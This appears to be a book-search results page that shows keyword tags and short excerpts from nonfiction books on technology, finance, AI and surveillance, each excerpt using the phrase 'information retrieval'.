Affordable Care Act / Obamacare, algorithmic trading, Amazon Mechanical Turk, American Legislative Exchange Council, asset-backed security, Atul Gawande, bank run, barriers to entry, basic income, Berlin Wall, Bernie Madoff, Black Swan, bonus culture, Brian Krebs, business cycle, call centre, Capital in the Twenty-First Century by Thomas Piketty, Chelsea Manning, Chuck Templeton: OpenTable:, cloud computing, collateralized debt obligation, computerized markets, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, crowdsourcing, cryptocurrency, Debian, don't be evil, drone strike, Edward Snowden, en.wikipedia.org, Fall of the Berlin Wall, Filter Bubble, financial innovation, financial thriller, fixed income, Flash crash, full employment, Goldman Sachs: Vampire Squid, Google Earth, Hernando de Soto, High speed trading, hiring and firing, housing crisis, informal economy, information asymmetry, information retrieval, interest rate swap, Internet of things, invisible hand, Jaron Lanier, Jeff Bezos, job automation, Julian Assange, Kevin Kelly, knowledge worker, Kodak vs Instagram, kremlinology, late fees, London Interbank Offered Rate, London Whale, Marc Andreessen, Mark Zuckerberg, mobile money, moral hazard, new economy, Nicholas Carr, offshore financial centre, PageRank, pattern recognition, Philip Mirowski, precariat, profit maximization, profit motive, quantitative easing, race to the bottom, recommendation engine, regulatory arbitrage, risk-adjusted returns, Satyajit Das, search engine result page, shareholder value, Silicon Valley, Snapchat, social intelligence, Spread Networks laid a new fibre optics cable between New York and Chicago, statistical arbitrage, statistical model, Steven Levy, the scientific method, too big to fail, transaction costs, two-sided market, universal basic income, Upton Sinclair, value at risk, WikiLeaks, zero-sum game

But here, again, competition may be illusory: it’s hard to see the rationale (or investor or public enthusiasm) for subjecting millions of volumes (many of them delicate) to another round of scanning. Once again, Google reigns by default. The question now is whether its dictatorship will be benign. Does Google intend Book Search to promote widespread public access, or is it envisioning finely tiered access to content, granted (and withheld) in opaque ways?168 Will Google grant open access to search results on its platform, so experts in library science and information retrieval can understand (and critique) its orderings of results?169 Finally, where will the profits go from this immense cooperative project? Will they be distributed fairly among contributors, or will this be another instance in which the aggregator of content captures an unfair share of revenues from well-established dynamics of content digitization? If the Internet is to prosper, all who provide content—its critical source of value—must share in the riches now enjoyed mainly by the megafirms that organize it.170 And to the extent that Google, Amazon, or any other major search engine limits access to an index of books, its archiving projects are suspect, whatever public-spirited slogans it may adduce in defense of them.171 Philosopher Iris Murdoch once said, “Man is a creature who makes pictures of himself and then comes to resemble the picture.


pages: 410 words: 119,823

Radical Technologies: The Design of Everyday Life by Adam Greenfield

3D printing, Airbnb, augmented reality, autonomous vehicles, bank run, barriers to entry, basic income, bitcoin, blockchain, business intelligence, business process, call centre, cellular automata, centralized clearinghouse, centre right, Chuck Templeton: OpenTable:, cloud computing, collective bargaining, combinatorial explosion, Computer Numeric Control, computer vision, Conway's Game of Life, cryptocurrency, David Graeber, dematerialisation, digital map, disruptive innovation, distributed ledger, drone strike, Elon Musk, Ethereum, ethereum blockchain, facts on the ground, fiat currency, global supply chain, global village, Google Glasses, IBM and the Holocaust, industrial robot, informal economy, information retrieval, Internet of things, James Watt: steam engine, Jane Jacobs, Jeff Bezos, job automation, John Conway, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Kevin Kelly, Kickstarter, late capitalism, license plate recognition, lifelogging, M-Pesa, Mark Zuckerberg, means of production, megacity, megastructure, minimum viable product, money: store of value / unit of account / medium of exchange, natural language processing, Network effects, New Urbanism, Occupy movement, Oculus Rift, Pareto efficiency, pattern recognition, Pearl River Delta, performance metric, Peter Eisenman, Peter Thiel, planetary scale, Ponzi scheme, post scarcity, post-work, RAND corporation, recommendation engine, RFID, rolodex, Satoshi Nakamoto, self-driving car, sentiment analysis, shareholder value, sharing economy, Silicon Valley, smart cities, smart contracts, social intelligence, sorting algorithm, special economic zone, speech recognition, stakhanovite, statistical model, stem cell, technoutopianism, Tesla Model S, the built environment, The Death and Life of Great American Cities, The Future of Employment, transaction costs, Uber for X, undersea cable, 
universal basic income, urban planning, urban sprawl, Whole Earth Review, WikiLeaks, women in the workforce

One scenario along these lines is that proposed by Simon Taylor, VP for Blockchain R&D at Barclays Bank, in a white paper on distributed-ledger applications prepared for the British government.19 Taylor imagines all of our personal information stored on a common blockchain, duly encrypted. Any legitimate actor, public or private—the HR department, the post office, your bank, the police—could query the same unimpeachable source of information, retrieve from it only what they were permitted to, and leave behind a trace of their access. Each of us would have read/write access to our own record; should we find erroneous information, we would have to make but one correction, and it would then propagate across the files of every institution with access to the ledger. Where the data undergirding our lives is now maintained on a thousand separate systems, and vital knowledge so often falls into the cracks between them, Taylor sees a single common and shared truth, referred to equally and with equal transparency by all parties.


pages: 303 words: 67,891

Advances in Artificial General Intelligence: Concepts, Architectures and Algorithms: Proceedings of the Agi Workshop 2006 by Ben Goertzel, Pei Wang

AI winter, artificial general intelligence, bioinformatics, brain emulation, combinatorial explosion, complexity theory, computer vision, conceptual framework, correlation coefficient, epigenetics, friendly AI, G4S, information retrieval, Isaac Newton, John Conway, Loebner Prize, Menlo Park, natural language processing, Occam's razor, p-value, pattern recognition, performance metric, Ray Kurzweil, Rodney Brooks, semantic web, statistical model, strong AI, theory of mind, traveling salesman, Turing machine, Turing test, Von Neumann architecture, Y2K

NARS can be connected to existing knowledge bases, such as Cyc (for commonsense knowledge), WordNet (for linguistic knowledge), Mizar (for mathematical knowledge), and so on. For each of them, a special interface module should be able to approximately translate knowledge from its original format into Narsese. The Internet: it is possible for NARS to be equipped with additional modules, which use techniques like the semantic web, information retrieval, and data mining, to directly acquire certain knowledge from the Internet and put it into Narsese. Natural language interface: after NARS has learned a natural language (as discussed previously), it should be able to accept knowledge from various sources in that language. Additionally, interactive tutoring will be necessary, which allows a human trainer to monitor the establishment of the knowledge base, to answer questions, and to guide the system to form a proper goal structure and priority distributions among its concepts, tasks, and beliefs.


pages: 455 words: 138,716

The Divide: American Injustice in the Age of the Wealth Gap by Matt Taibbi

banking crisis, Bernie Madoff, butterfly effect, buy and hold, collapse of Lehman Brothers, collateralized debt obligation, Corrections Corporation of America, Credit Default Swap, credit default swaps / collateralized debt obligations, Edward Snowden, ending welfare as we know it, fixed income, forensic accounting, Gordon Gekko, greed is good, illegal immigration, information retrieval, London Interbank Offered Rate, London Whale, naked short selling, offshore financial centre, Ponzi scheme, profit motive, regulatory arbitrage, short selling, telemarketer, too big to fail, War on Poverty

“Just think what I could do with your emails,” he hissed, adding that he, Spyro, was going to “consider all my options as maintaining our confidentiality,” and that if the executive didn’t cooperate, he could “no longer rely on my discretion.” Contogouris seemed to be playing a triple game. First, he was genuinely trying to deliver an informant to the FBI and set himself up as an FBI informant. Second, he was trying to deliver confidential information to the hedge funds, to whom he had set himself up as an expert at information retrieval. And third, he was playing secret source to “reputable” journalists, to whom he had promised to deliver stunning exposés. Contogouris even referenced one of those contacts in his adolescent coded emails to Sender sent from London that day: CONTOGOURIS: We have been rapping here about the postman. He’s going to deliver mail. The senders want a message delivered*11 “The postman” here was Boyd of the New York Post, with whom Contogouris had been working to prepare a major “exposé” on Fairfax.


pages: 696 words: 143,736

The Age of Spiritual Machines: When Computers Exceed Human Intelligence by Ray Kurzweil

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, Buckminster Fuller, call centre, cellular automata, combinatorial explosion, complexity theory, computer age, computer vision, cosmological constant, cosmological principle, Danny Hillis, double helix, Douglas Hofstadter, Everything should be made as simple as possible, first square of the chessboard / second half of the chessboard, fudge factor, George Gilder, Gödel, Escher, Bach, I think there is a world market for maybe five computers, information retrieval, invention of movable type, Isaac Newton, iterative process, Jacquard loom, John Markoff, John von Neumann, Lao Tzu, Law of Accelerating Returns, mandelbrot fractal, Marshall McLuhan, Menlo Park, natural language processing, Norbert Wiener, optical character recognition, ought to be enough for anybody, pattern recognition, phenotype, Ralph Waldo Emerson, Ray Kurzweil, Richard Feynman, Robert Metcalfe, Schrödinger's Cat, Search for Extraterrestrial Intelligence, self-driving car, Silicon Valley, social intelligence, speech recognition, Steven Pinker, Stewart Brand, stochastic process, technological singularity, Ted Kaczynski, telepresence, the medium is the message, There's no reason for any individual to have a computer in his home - Ken Olsen, traveling salesman, Turing machine, Turing test, Whole Earth Review, Y2K

Cybernetic poet A computer program that is able to create original poetry. Cybernetics A term coined by Norbert Wiener to describe the “science of control and communication in animals and machines.” Cybernetics is based on the theory that intelligent living beings adapt to their environments and accomplish objectives primarily by reacting to feedback from their surroundings. Database The structured collection of data that is designed in connection with an information retrieval system. A database management system (DBMS) allows monitoring, updating, and interacting with the database. Debugging The process of discovering and correcting errors in computer hardware and software. The issue of bugs or errors in a program will become increasingly important as computers are integrated into the human brain and physiology throughout the twenty-first century. The first “bug” was an actual moth, discovered by Grace Murray Hopper, the first programmer of the Mark I computer.


pages: 550 words: 154,725

The Idea Factory: Bell Labs and the Great Age of American Innovation by Jon Gertner

Albert Einstein, back-to-the-land, Black Swan, business climate, Claude Shannon: information theory, Clayton Christensen, complexity theory, corporate governance, cuban missile crisis, Edward Thorp, horn antenna, Hush-A-Phone, information retrieval, invention of the telephone, James Watt: steam engine, Karl Jansky, knowledge economy, Leonard Kleinrock, Metcalfe’s law, Nicholas Carr, Norbert Wiener, Picturephone, Richard Feynman, Robert Metcalfe, Sand Hill Road, Silicon Valley, Skype, Steve Jobs, Telecommunications Act of 1996, traveling salesman, undersea cable, uranium enrichment, William Shockley: the traitorous eight

A visitor could also try something called a portable “pager,” a big, blocky device that could alert doctors and other busy professionals when they received urgent calls.2 New York’s fair would dwarf Seattle’s. The crowds were expected to be immense—probably somewhere around 50 or 60 million people in total. Pierce and David’s 1961 memo recommended a number of exhibits: “personal hand-carried telephones,” “business letters in machine-readable form, transmitted by wire,” “information retrieval from a distant computer-automated library,” and “satellite and space communications.” By the time the fair opened in April 1964, though, the Bell System exhibits, housed in a huge white cantilevered building nicknamed the “floating wing,” described a more conservative future than the one Pierce and David had envisioned. The exhibit was primarily explanatory. Visitors could get a sense of how quality control worked at Western Electric factories, or how researchers at Bell Labs grew pure crystals necessary for transistors.


pages: 492 words: 153,565

Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter

Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, Firefox, friendly fire, Google Earth, information retrieval, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, Maui Hawaii, MITM: man-in-the-middle, pre–internet, RAND corporation, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day

See “Software Problem Led to System Failure at Dhahran, Saudi Arabia,” US Government Accountability Office, February 4, 1992, available at gao.gov/products/IMTEC-92-26. 22 Bryan, “Lessons from Our Cyber Past.” 23 “The Information Operations Roadmap,” dated October 30, 2003, is a seventy-four-page report that was declassified in 2006, though the pages dealing with computer network attacks are heavily redacted. The document is available at http://information-retrieval.info/docs/DoD-IO.html. 24 Arquilla Frontline “CyberWar!” interview. A Washington Post story indicates that attacks on computers controlling air-defense systems in Kosovo were launched from electronic-jamming aircraft rather than over computer networks from ground-based keyboards. Bradley Graham, “Military Grappling with Rules for Cyber,” Washington Post, November 8, 1999. 25 James Risen, “Crisis in the Balkans: Subversion; Covert Plan Said to Take Aim at Milosevic’s Hold on Power,” New York Times, June 18, 1999.


pages: 527 words: 147,690

Terms of Service: Social Media and the Price of Constant Connection by Jacob Silverman

23andMe, 4chan, A Declaration of the Independence of Cyberspace, Airbnb, airport security, Amazon Mechanical Turk, augmented reality, basic income, Brian Krebs, California gold rush, call centre, cloud computing, cognitive dissonance, commoditize, correlation does not imply causation, Credit Default Swap, crowdsourcing, don't be evil, drone strike, Edward Snowden, feminist movement, Filter Bubble, Firefox, Flash crash, game design, global village, Google Chrome, Google Glasses, hive mind, income inequality, informal economy, information retrieval, Internet of things, Jaron Lanier, jimmy wales, Kevin Kelly, Kickstarter, knowledge economy, knowledge worker, late capitalism, license plate recognition, life extension, lifelogging, Lyft, Mark Zuckerberg, Mars Rover, Marshall McLuhan, mass incarceration, meta analysis, meta-analysis, Minecraft, move fast and break things, move fast and break things, national security letter, Network effects, new economy, Nicholas Carr, Occupy movement, optical character recognition, payday loans, Peter Thiel, postindustrial economy, prediction markets, pre–internet, price discrimination, price stability, profit motive, quantitative hedge fund, race to the bottom, Ray Kurzweil, recommendation engine, rent control, RFID, ride hailing / ride sharing, self-driving car, sentiment analysis, shareholder value, sharing economy, Silicon Valley, Silicon Valley ideology, Snapchat, social graph, social intelligence, social web, sorting algorithm, Steve Ballmer, Steve Jobs, Steven Levy, TaskRabbit, technoutopianism, telemarketer, transportation-network company, Travis Kalanick, Turing test, Uber and Lyft, Uber for X, uber lyft, universal basic income, unpaid internship, women in the workforce, Y Combinator, Zipcar

Already the NSA is able to record and sort all phone calls in several countries in real time. As storage costs decrease and analytical powers grow, it’s not unreasonable to think that this capability will be extended to other targets, including, should the political environment allow it, the United States. Some of the NSA’s surveillance capacity derives from deals made with Internet firms—procedures for automating court-authorized information retrieval, direct access to central servers, and even (as in the case of Verizon) fiber optic cables piped from military bases into major Internet hubs. In the United States, the NSA uses the FBI to conduct surveillance authorized under the Patriot Act and to issue National Security Letters (NSLs)—subpoenas requiring recipients to turn over any information deemed relevant to an ongoing investigation.


pages: 467 words: 149,632

If Then: How Simulmatics Corporation Invented the Future by Jill Lepore

A Declaration of the Independence of Cyberspace, anti-communist, Buckminster Fuller, computer age, coronavirus, cuban missile crisis, desegregation, don't be evil, Donald Trump, Elon Musk, game design, George Gilder, Grace Hopper, Hacker Ethic, Howard Zinn, index card, information retrieval, Jaron Lanier, Jeff Bezos, Jeffrey Epstein, job automation, land reform, linear programming, Mahatma Gandhi, Marc Andreessen, Mark Zuckerberg, mass incarceration, Maui Hawaii, Menlo Park, New Journalism, New Urbanism, Norbert Wiener, Norman Mailer, packet switching, Peter Thiel, profit motive, RAND corporation, Robert Bork, Ronald Reagan, Rosa Parks, self-driving car, Silicon Valley, smart cities, South China Sea, Stewart Brand, technoutopianism, Telecommunications Act of 1996, urban renewal, War on Poverty, white flight, Whole Earth Catalog

To help his reader picture what he pictured, he conjured a scene set in 2000 in which a person sits at a computer console and attempts to get to the bottom of a research question merely by undertaking a series of searches. Nearly all of what Licklider described in Libraries of the Future later came to pass: the digitization of printed material, the networking of library catalogs and their contents, the development of sophisticated, natural language–based information-retrieval and search mechanisms.23 Licklider described, with a contagious amazement, what would become, in the twenty-first century, the Internet at its very best. In 1962, Licklider left Bolt Beranek and Newman for ARPA, where his many duties included funding behavioral science projects, including Pool’s Project ComCom. At ARPA, Licklider also funded research that produced the building blocks of his imagined intergalactic computer network, which came to be called ARPANET.


pages: 542 words: 161,731

Alone Together by Sherry Turkle

Albert Einstein, Columbine, global village, Hacker Ethic, helicopter parent, Howard Rheingold, industrial robot, information retrieval, Jacques de Vaucanson, Jaron Lanier, Joan Didion, John Markoff, Kevin Kelly, lifelogging, Loebner Prize, Marshall McLuhan, meta analysis, meta-analysis, Nicholas Carr, Norbert Wiener, Panopticon Jeremy Bentham, Ralph Waldo Emerson, Rodney Brooks, Skype, social intelligence, stem cell, technoutopianism, The Great Good Place, the medium is the message, theory of mind, Turing test, Vannevar Bush, Wall-E, women in the workforce, Year of Magical Thinking

From 1996 on, Thad Starner, who like Steve Mann was a member of the MIT cyborg group, worked on the Remembrance Agent, a tool that would sit on your computer desktop (or now, your mobile device) and not only record what you were doing but make suggestions about what you might be interested in looking at next. See Bradley J. Rhodes and Thad Starner, “Remembrance Agent: A Continuously Running Personal Information Retrieval System,” Proceedings of the First International Conference on the Practical Application of Intelligent Agents and Multi Agent Technology (PAAM ’96), 487–495, www.bradleyrhodes.com/Papers/remembrance.html (accessed December 14, 2009). Albert Frigo’s “Storing, Indexing and Retrieving My Autobiography,” presented at the 2004 Workshop on Memory and the Sharing of Experience in Vienna, Austria, describes a device to take pictures of what comes into his hand.


pages: 574 words: 164,509

Superintelligence: Paths, Dangers, Strategies by Nick Bostrom

agricultural Revolution, AI winter, Albert Einstein, algorithmic trading, anthropic principle, anti-communist, artificial general intelligence, autonomous vehicles, barriers to entry, Bayesian statistics, bioinformatics, brain emulation, cloud computing, combinatorial explosion, computer vision, cosmological constant, dark matter, DARPA: Urban Challenge, data acquisition, delayed gratification, demographic transition, different worldview, Donald Knuth, Douglas Hofstadter, Drosophila, Elon Musk, en.wikipedia.org, endogenous growth, epigenetics, fear of failure, Flash crash, Flynn Effect, friendly AI, Gödel, Escher, Bach, income inequality, industrial robot, informal economy, information retrieval, interchangeable parts, iterative process, job automation, John Markoff, John von Neumann, knowledge worker, longitudinal study, Menlo Park, meta analysis, meta-analysis, mutually assured destruction, Nash equilibrium, Netflix Prize, new economy, Norbert Wiener, NP-complete, nuclear winter, optical character recognition, pattern recognition, performance metric, phenotype, prediction markets, price stability, principal–agent problem, race to the bottom, random walk, Ray Kurzweil, recommendation engine, reversible computing, social graph, speech recognition, Stanislav Petrov, statistical model, stem cell, Stephen Hawking, strong AI, superintelligent machines, supervolcano, technological singularity, technoutopianism, The Coming Technological Singularity, The Nature of the Firm, Thomas Kuhn: the structure of scientific revolutions, transaction costs, Turing machine, Vernor Vinge, Watson beat the top human players on Jeopardy!, World Values Survey, zero-sum game

Software polices the world’s email traffic, and despite continual adaptation by spammers to circumvent the countermeasures being brought against them, Bayesian spam filters have largely managed to hold the spam tide at bay. Software using AI components is responsible for automatically approving or declining credit card transactions, and continuously monitors account activity for signs of fraudulent use. Information retrieval systems also make extensive use of machine learning. The Google search engine is, arguably, the greatest AI system that has yet been built. Now, it must be stressed that the demarcation between artificial intelligence and software in general is not sharp. Some of the applications listed above might be viewed more as generic software applications rather than AI in particular—though this brings us back to McCarthy’s dictum that when something works it is no longer called AI.
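A Bayesian spam filter of the kind mentioned above can be sketched in a few lines. This is a minimal sketch of naive Bayes over word counts with Laplace smoothing; the whitespace tokenizer, smoothing constant, and toy training data are illustrative choices, not a description of any deployed filter:

```python
import math
from collections import Counter

def train(messages):
    """messages: list of (text, is_spam) pairs.
    Returns per-class word counts and per-class message totals."""
    counts = {True: Counter(), False: Counter()}
    totals = {True: 0, False: 0}
    for text, is_spam in messages:
        for word in text.lower().split():
            counts[is_spam][word] += 1
        totals[is_spam] += 1
    return counts, totals

def spam_probability(counts, totals, text, k=1.0):
    """Laplace-smoothed naive Bayes estimate of P(spam | text)."""
    vocab = set(counts[True]) | set(counts[False])
    # Start from the log prior odds, then add one log-likelihood
    # ratio per known word in the message.
    log_odds = math.log(totals[True] / totals[False])
    for word in set(text.lower().split()) & vocab:
        p_spam = (counts[True][word] + k) / (sum(counts[True].values()) + k * len(vocab))
        p_ham = (counts[False][word] + k) / (sum(counts[False].values()) + k * len(vocab))
        log_odds += math.log(p_spam / p_ham)
    return 1 / (1 + math.exp(-log_odds))
```

Trained on a handful of labeled messages, the classifier pushes messages sharing vocabulary with the spam class above 0.5 and the rest below it; real filters differ mainly in tokenization, feature selection, and the sheer volume of training mail.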


Smart Grid Standards by Takuro Sato

business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, energy security, factory automation, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport

Unlike the C12.18 or C12.21 protocols, which only support session-oriented communications, sessionless communication has the advantage of requiring less complex handling on both sides of the communication link and reduces signaling overhead. ANSI C12.22 has a common application layer (layer 7 in the OSI, Open System Interconnection, reference model), which provides a minimal set of services and data structures required to support C12.22 nodes for the purposes of configuration, programming, and information retrieval in a networked environment. The application layer is independent of the underlying network technologies. This enables interoperability of C12.22 with existing communication systems. C12.22 also defines a number of application layer services, which are combined to realize the various functions of the C12.22 protocols. The application layer services provided in C12.22 are: • Identification Service: This service is used to obtain information about C12.19 device functionality, including the reference standard, the version and revision of the reference standard implemented, and an optional feature list.


pages: 1,331 words: 163,200

Hands-On Machine Learning With Scikit-Learn and TensorFlow: Concepts, Tools, and Techniques to Build Intelligent Systems by Aurélien Géron

Amazon Mechanical Turk, Anton Chekhov, combinatorial explosion, computer vision, constrained optimization, correlation coefficient, crowdsourcing, don't repeat yourself, Elon Musk, en.wikipedia.org, friendly AI, ImageNet competition, information retrieval, iterative process, John von Neumann, Kickstarter, natural language processing, Netflix Prize, NP-complete, optical character recognition, P = NP, p-value, pattern recognition, pull request, recommendation engine, self-driving car, sentiment analysis, SpamAssassin, speech recognition, stochastic process

Visualize the images that most activate each neuron in the coding layer. Build a classification deep neural network, reusing the lower layers of the autoencoder. Train it using only 10% of the training set. Can you get it to perform as well as the same classifier trained on the full training set? Semantic hashing, introduced in 2008 by Ruslan Salakhutdinov and Geoffrey Hinton,13 is a technique used for efficient information retrieval: a document (e.g., an image) is passed through a system, typically a neural network, which outputs a fairly low-dimensional binary vector (e.g., 30 bits). Two similar documents are likely to have identical or very similar hashes. By indexing each document using its hash, it is possible to retrieve many documents similar to a particular document almost instantly, even if there are billions of documents: just compute the hash of the document and look up all documents with that same hash (or hashes differing by just one or two bits).
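The index-and-lookup scheme described above can be sketched as follows. The hashing function below is a stand-in assumption: instead of the trained autoencoder Salakhutdinov and Hinton use, it binarizes random hyperplane projections of a document vector, which preserves the hash-bucket indexing and the "probe hashes differing by a bit or two" lookup without the training step:

```python
import random
from collections import defaultdict
from itertools import combinations

random.seed(0)

N_BITS = 16   # hash length; the example in the text uses around 30 bits
DIM = 64      # dimensionality of the (hypothetical) document vectors

# Stand-in for the trained network: one random hyperplane per output bit.
planes = [[random.gauss(0, 1) for _ in range(DIM)] for _ in range(N_BITS)]

def semantic_hash(vec):
    """Map a document vector to a binary code: the sign of each projection."""
    return tuple(int(sum(p * v for p, v in zip(plane, vec)) > 0)
                 for plane in planes)

index = defaultdict(list)

def add_document(doc_id, vec):
    index[semantic_hash(vec)].append(doc_id)

def lookup(vec, max_flips=2):
    """Return documents whose hash differs from vec's by at most max_flips bits."""
    h = semantic_hash(vec)
    results = list(index[h])
    for r in range(1, max_flips + 1):
        for bits in combinations(range(N_BITS), r):
            flipped = tuple(b ^ 1 if i in bits else b for i, b in enumerate(h))
            results.extend(index[flipped])
    return results
```

Lookup cost depends only on the number of probed buckets (here 1 + 16 + 120), not on the number of indexed documents, which is the point of the technique.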


pages: 611 words: 188,732

Valley of Genius: The Uncensored History of Silicon Valley (As Told by the Hackers, Founders, and Freaks Who Made It Boom) by Adam Fisher

Airbnb, Albert Einstein, AltaVista, Apple II, Apple's 1984 Super Bowl advert, augmented reality, autonomous vehicles, Bob Noyce, Brownian motion, Buckminster Fuller, Burning Man, Byte Shop, cognitive dissonance, disintermediation, don't be evil, Donald Trump, Douglas Engelbart, Dynabook, Elon Musk, frictionless, glass ceiling, Hacker Ethic, Howard Rheingold, HyperCard, hypertext link, index card, informal economy, information retrieval, Jaron Lanier, Jeff Bezos, Jeff Rulifson, John Markoff, Jony Ive, Kevin Kelly, Kickstarter, knowledge worker, life extension, Marc Andreessen, Mark Zuckerberg, Marshall McLuhan, Maui Hawaii, Menlo Park, Metcalfe’s law, Mother of all demos, move fast and break things, move fast and break things, Network effects, new economy, nuclear winter, PageRank, Paul Buchheit, paypal mafia, peer-to-peer, Peter Thiel, pets.com, pez dispenser, popular electronics, random walk, risk tolerance, Robert Metcalfe, rolodex, self-driving car, side project, Silicon Valley, Silicon Valley startup, skunkworks, Skype, social graph, social web, South of Market, San Francisco, Startup school, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, telerobotics, The Hackers Conference, the new new thing, Tim Cook: Apple, tulip mania, V2 rocket, Whole Earth Catalog, Whole Earth Review, Y Combinator

Alan Kay: We could actually see that ideas could be organized in a different way, that they could be filtered in a different way, that what we were looking at was not something that was trying to automate current modes of thought, but that there should be an amplification relationship between us and this new technology. Engelbart’s NLS terminal had a screen and keyboard, windows, and a mouse. He showed off a way to edit text, a version of e-mail, even a primitive Skype. To modern eyes, Engelbart’s computer system looks pretty familiar, but to an audience used to punch cards and printouts it was a revelation. The computer could be more than a number cruncher; it could be a communications and information-retrieval tool. In one ninety-minute demo Engelbart shattered the military-industrial computing paradigm, and gave the hippies and freethinkers and radicals who were already gathering in Silicon Valley a vision of the future that would drive the culture of technology for the next several decades. Bob Taylor: There was about a thousand or more people in the audience and they were blown away. Andy van Dam: I was blown away to see this professional system with this unbelievable richness and complexity.


In the Age of the Smart Machine by Shoshana Zuboff

affirmative action, American ideology, blue-collar work, collective bargaining, computer age, Computer Numeric Control, conceptual framework, data acquisition, demand response, deskilling, factory automation, Ford paid five dollars a day, fudge factor, future of work, industrial robot, information retrieval, interchangeable parts, job automation, lateral thinking, linked data, Marshall McLuhan, means of production, old-boy network, optical character recognition, Panopticon Jeremy Bentham, post-industrial society, RAND corporation, Shoshana Zuboff, social web, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, zero-sum game

It comes from understanding your business. The designers complained that as systems use became more central to task performance, managers and operators would need a more analytic understanding of their work in order to determine their information requirements. They would also need a deeper level of insight into the systems themselves (procedural reasoning) that would allow them to go beyond simple information retrieval to actually becoming familiar with data and generating new insights. People don't know enough about what goes into making up their job. Time hasn't been spent with them to tell them why. They've just been told, "Here's the system and here's how to use it." But they have to learn more about their job and more about the systems if they are going to figure out not only how to get data but what data they need.


pages: 685 words: 203,949

The Organized Mind: Thinking Straight in the Age of Information Overload by Daniel J. Levitin

airport security, Albert Einstein, Amazon Mechanical Turk, Anton Chekhov, Bayesian statistics, big-box store, business process, call centre, Claude Shannon: information theory, cloud computing, cognitive bias, complexity theory, computer vision, conceptual framework, correlation does not imply causation, crowdsourcing, cuban missile crisis, Daniel Kahneman / Amos Tversky, delayed gratification, Donald Trump, en.wikipedia.org, epigenetics, Eratosthenes, Exxon Valdez, framing effect, friendly fire, fundamental attribution error, Golden Gate Park, Google Glasses, haute cuisine, impulse control, index card, indoor plumbing, information retrieval, invention of writing, iterative process, jimmy wales, job satisfaction, Kickstarter, life extension, longitudinal study, meta analysis, meta-analysis, more computing power than Apollo, Network effects, new economy, Nicholas Carr, optical character recognition, Pareto efficiency, pattern recognition, phenotype, placebo effect, pre–internet, profit motive, randomized controlled trial, Rubik’s Cube, shared worldview, Skype, Snapchat, social intelligence, statistical model, Steve Jobs, supply-chain management, the scientific method, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, theory of mind, Thomas Bayes, Turing test, ultimatum game, zero-sum game

Publisher’s Weekly, 246(2), p. 63. All bits are created equal After writing this, I discovered the same phrase “all bits are created equal” in Gleick, J. (2011). The information: A history, a theory, a flood. New York, NY: Vintage. Information has thus become separated from meaning Gleick writes “information is divorced from meaning.” He cites the technology philosopher Lewis Mumford from 1970: “Unfortunately, ‘information retrieving,’ however swift, is no substitute for discovering by direct personal inspection knowledge whose very existence one had possibly never been aware of, and following it at one’s own pace through the further ramification of relevant literature.” Gleick, J. (2011). The information: A history, a theory, a flood. New York, NY: Vintage. “The medium does matter. . . .” Carr, N. (2010). The shallows: What the internet is doing to our brains.


Mining of Massive Datasets by Jure Leskovec, Anand Rajaraman, Jeffrey David Ullman

cloud computing, crowdsourcing, en.wikipedia.org, first-price auction, G4S, information retrieval, John Snow's cholera map, Netflix Prize, NP-complete, PageRank, pattern recognition, random walk, recommendation engine, second-price auction, sentiment analysis, social graph, statistical model, web application

Gaber, Scientific Data Mining and Knowledge Discovery – Principles and Foundations, Springer, New York, 2010. [3] H. Garcia-Molina, J.D. Ullman, and J. Widom, Database Systems: The Complete Book, Second Edition, Prentice-Hall, Upper Saddle River, NJ, 2009. [4] D.E. Knuth, The Art of Computer Programming, Vol. 3 (Sorting and Searching), Second Edition, Addison-Wesley, Upper Saddle River, NJ, 1998. [5] C.D. Manning, P. Raghavan, and H. Schütze, Introduction to Information Retrieval, Cambridge University Press, 2008. [6] R.K. Merton, “The Matthew effect in science,” Science 159:3810, pp. 56–63, Jan. 5, 1968. [7] P.-N. Tan, M. Steinbach, and V. Kumar, Introduction to Data Mining, Addison-Wesley, Upper Saddle River, NJ, 2005. 1 This startup attempted to use machine learning to mine large-scale data, and hired many of the top machine-learning people to do so. Unfortunately, it was not able to survive. 2 See http://en.wikipedia.org/wiki/1854_Broad_Street_cholera_outbreak. 3 That is, assume our hypothesis that terrorists will surely buy a set of 10 items in common at some time during the year.


The Code: Silicon Valley and the Remaking of America by Margaret O'Mara

